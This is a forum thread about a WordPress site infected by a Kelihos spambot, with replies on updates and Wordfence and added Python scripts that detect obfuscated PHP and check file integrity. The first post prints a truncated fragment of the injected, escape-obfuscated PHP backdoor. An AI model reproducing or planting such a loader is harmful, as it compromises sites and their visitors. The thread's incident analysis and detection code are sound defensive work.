zero

Keep your WordPress updated or you will be a victim

8 posts in this topic

We first noticed something was amiss when we kept receiving alerts of disk I/O going through the roof. I guess I was sloppy in finding out the root cause; I just took it that some guy was going batshit crazy and running a lot of backups. I didn't bother much because if he screwed around too much, LVE would kick in and deal with it.

A few days later I received an email from another user complaining that he could not send any emails to Hotmail. The error message showed that our IP was blocked. I did some digging and found that the server was listed in the Composite Block List (CBL).

IP Address 10.xx.xx.xx is listed in the CBL. It shows signs of being infected with a spam sending trojan, malicious link or some other form of botnet.

It was last detected at 2015-10-07 22:00 GMT (+/- 30 minutes), approximately 7 days, 10 hours, 59 minutes ago.

This IP is infected (or NATting for a computer that is infected) with the kelihos spambot. In other words, it's participating in a botnet.

Well... Fuck.

More on Kelihos here.

Looking through the mail queue gave us the answer as to which site was compromised. The question was: how was the site compromised? After checking each individual site, the issue was isolated to only one website. Some obfuscated code was present in each .php file on the hacked site, something that looked like the below:

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $zdsnpbzghe = 'x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>5c%x7860QUUI&e_SEEB%x5-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%xX;%x5c%x7860msvd}R;*msv%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutC%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x7825of.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>

According to http://security.stackexchange.com/questions/70579/is-this-a-backdoor, the code allows the attacker to append any HTML or JavaScript. By this time I had no idea how many spam mails had been sent, but there were about 15,000 emails still stuck in the mail queue.

This proved to be a very expensive lesson for the site owner. He was running an outdated version of WordPress with a custom-made cart plugin. I suspect that the plugin was the source of the vulnerability. The site owner was not willing to spend money on a service like Sucuri to get his site fixed and he did not have backups. The only option left was to shut his site down.

Key takeaways:

  1. Keep your site updated.
  2. Have lots of backups.
  3. Try and stay away from custom plugins unless you're very sure they are secure.
Edited by zero
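The snippet quoted in the post hides every string literal behind PHP `\xHH` (hex) and `\NNN` (octal) escapes. Decoding them turns `"\x61\156\x75\156\x61"` into `anuna` and the `$_SERVER` key into `HTTP_USER_AGENT`, showing that the prefix sets a `$GLOBALS` flag only when the visitor's browser does not identify as Internet Explorer (`msie` / `rv:11`), which is one reason a site owner can browse a compromised site and see nothing wrong. The following Python triage script is an added example, not code from the post or from the snippet's author: it decodes those escapes, flags PHP files that carry the pattern, and walks a directory tree so every `.php` file can be checked, as the post describes. The infected sample is built from the first statement of the quoted snippet plus constructed stand-in code; the function names, indicator wording and the "three or more obfuscated literals" threshold are assumptions of this example.

```python
"""Triage helper for escape-obfuscated PHP (added example, not the post's code)."""
import os
import re

# PHP double-quoted string escapes: \xHH (hex) and \NNN (octal), the two forms
# the injected snippet uses to hide every string literal.
ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")
# A PHP double-quoted string literal, allowing escaped characters inside it.
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')
# A $GLOBALS key written entirely as escape sequences (never needed in real code).
ESCAPED_GLOBALS_KEY = re.compile(r'\$GLOBALS\["(?:\\x[0-9A-Fa-f]{2}|\\[0-7]{1,3})+"\]')


def decode_php_escapes(literal: str) -> str:
    """Resolve \\xHH and \\NNN escapes so the hidden string becomes readable."""
    def replace(match: re.Match) -> str:
        if match.group(1) is not None:
            return chr(int(match.group(1), 16))
        return chr(int(match.group(2), 8))
    return ESCAPE.sub(replace, literal)


def scan_php_source(src: str) -> dict:
    """Decode obfuscated literals in one PHP source and list the indicators hit."""
    decoded = [decode_php_escapes(m.group(1))
               for m in STRING_LITERAL.finditer(src) if ESCAPE.search(m.group(1))]
    indicators = []
    if "HTTP_USER_AGENT" in decoded:
        indicators.append("superglobal key HTTP_USER_AGENT hidden behind escapes")
    if ESCAPED_GLOBALS_KEY.search(src):
        indicators.append("$GLOBALS key written entirely as escape sequences")
    if len(decoded) >= 3:  # assumed threshold: real code rarely needs many escaped literals
        indicators.append(f"{len(decoded)} escape-obfuscated string literals")
    return {"decoded_literals": decoded, "indicators": indicators,
            "suspicious": bool(indicators)}


def scan_tree(root: str) -> dict:
    """Scan every .php file under root; return {path: result} for suspicious files."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    result = scan_php_source(fh.read())
                if result["suspicious"]:
                    hits[path] = result
    return hits


# Constructed samples. INFECTED_SAMPLE starts with the first statement of the
# snippet quoted in the post, followed by stand-in "legitimate" code.
INFECTED_SAMPLE = r'''<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php
// constructed: the site's real code followed the injected prefix
echo "Hello, world\n";
'''
CLEAN_SAMPLE = r'''<?php
// constructed: ordinary code with a normal escape inside a literal
echo "Hello, world\n";
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
'''

if __name__ == "__main__":
    for label, sample in (("infected", INFECTED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        result = scan_php_source(sample)
        print(label, "->", "SUSPICIOUS" if result["suspicious"] else "ok")
        for literal in result["decoded_literals"]:
            print("   decoded literal:", literal)
        for indicator in result["indicators"]:
            print("   indicator:", indicator)
```

Run `scan_tree("/path/to/site")` against a copy of the web root (not the live tree while you are still investigating) and every flagged file is a candidate for restoration from a clean backup; the decoded literals tell you what the hidden code is looking at without executing it.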

I know WordPress is more popular than Blogspot these days because of its many features. Who would have thought that forgetting a simple step like updating could cause such vulnerabilities. I think some people don't update because there are times when updates were kind of undesirable. Most people are not comfortable with change, and many updates put them out of their comfort zones. I still remember how mad I was when YouTube removed my favorite features because of an update. That is one reason why people don't update. Another one would be laziness and lack of patience.

Those annoying bots really make me mad because they don't care if what they do is illegal. All they care about is getting profit from people who are gullible enough to click their traps. So now they hack sites to spread their spamming terror.


I currently use the plugin Wordfence Security. Does anybody know whether or not this plugin is beneficial or if it's a simple gimmick? I always believed the site was safe with it running, but all these hacks have gotten me slightly nervous.


I only use WordPress in other programs. Do I need to update it in the other programs, or will they do it for me usually? How would I do that anyway? I'm a total beginner when it comes to WordPress.


I only use WordPress in other programs. Do I need to update it in the other programs, or will they do it for me usually? How would I do that anyway? I'm a total beginner when it comes to WordPress.

It doesn't apply to you unless you are maintaining a site utilizing WordPress.


I currently use the plugin Wordfence Security. Does anybody know whether or not this plugin is beneficial or if it's a simple gimmick? I always believed the site was safe with it running, but all these hacks have gotten me slightly nervous.

I don't think the free version of Wordfence helps you block such attacks. It's useful if you need to run a scan on your WordPress site. It basically compares your PHP files with the default WordPress files and asks you if you want to restore the original. You can also compare both files and see what was changed. However, the goal is to prevent such issues from happening, and I doubt there's a free plugin that does that.
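The scan described above, comparing the site's PHP files with a known-good copy, does not need a plugin: hash a pristine tree (a fresh download of the same WordPress release plus the plugins you actually installed) into a baseline, and diff the live tree against it on a schedule. The following Python is an added example, not Wordfence's code or anything posted in the thread. The file layout and contents in `demo()` are constructed, and `INJECTED_PREFIX` is a labelled stand-in for the obfuscated code from the first post; it reproduces the symptom the original poster saw, every `.php` file changed at once, which this check surfaces as a long "modified" list.

```python
"""Baseline file-integrity check for a WordPress tree (added example)."""
import hashlib
import json
import tempfile
from pathlib import Path


def hash_tree(root, suffixes=(".php",)) -> dict:
    """Map each file under root (relative POSIX path) to its SHA-256 hex digest."""
    root = Path(root)
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix in suffixes:
            digests[path.relative_to(root).as_posix()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def save_baseline(digests: dict, dest) -> None:
    """Persist the baseline; keep this file off the web server (e.g. with the backups)."""
    Path(dest).write_text(json.dumps(digests, indent=2, sort_keys=True))


def load_baseline(src) -> dict:
    return json.loads(Path(src).read_text())


def diff_trees(baseline: dict, current: dict) -> dict:
    """Classify files as modified, added or removed relative to the baseline."""
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


# Constructed stand-in for the obfuscated prefix quoted in the first post.
INJECTED_PREFIX = "<?php /* constructed stand-in for an injected loader */ ?>"


def demo() -> dict:
    """Build a small constructed site, baseline it, alter it, and return the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp) / "site"
        files = {  # constructed layout, not real WordPress contents
            "index.php": "<?php require 'wp-blog-header.php';\n",
            "wp-includes/functions.php": "<?php function wp_hello() { return 'hi'; }\n",
            "wp-content/plugins/shop/cart.php": "<?php // constructed custom cart plugin\n",
        }
        for rel, body in files.items():
            target = site / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        baseline_file = Path(tmp) / "baseline.json"
        save_baseline(hash_tree(site), baseline_file)

        # Simulate the symptom from the thread: every .php file gains the same
        # prefix, and one file the baseline never knew about appears.
        for rel in files:
            path = site / rel
            path.write_text(INJECTED_PREFIX + path.read_text())
        extra = site / "wp-content/uploads/.cache.php"
        extra.parent.mkdir(parents=True, exist_ok=True)
        extra.write_text("<?php // constructed unexpected file\n")

        return diff_trees(load_baseline(baseline_file), hash_tree(site))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}:")
        for p in paths:
            print("   ", p)
```

In practice, take the baseline from a fresh install of the same version rather than from the live site, since a baseline captured after the compromise would simply bless the injected code; and hash the uploads directory too, because `.php` files have no business appearing there. A clean diff is evidence the files are intact, not that the installed version is free of vulnerabilities, so it complements updating rather than replacing it.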

On 11/3/2015, 12:47:14, nytegeek said:

It doesn't apply to you unless you are maintaining a site utilizing WordPress.

Ok, so I don't have to worry about it then. That's a relief. I had no idea how I was going to update my site when it wasn't directly through WordPress. Thanks for the info.

On 11/3/2015, 6:25:50, zero said:

I don't think the free version of Wordfence helps you block such attacks. It's useful if you need to run a scan on your WordPress site. It basically compares your PHP files with the default WordPress files and asks you if you want to restore the original. You can also compare both files and see what was changed. However, the goal is to prevent such issues from happening, and I doubt there's a free plugin that does that.

Can anyone recommend a plugin (paid) that would help secure my WordPress site? I just need to make sure the online store side of my website does not get compromised. Thank you.
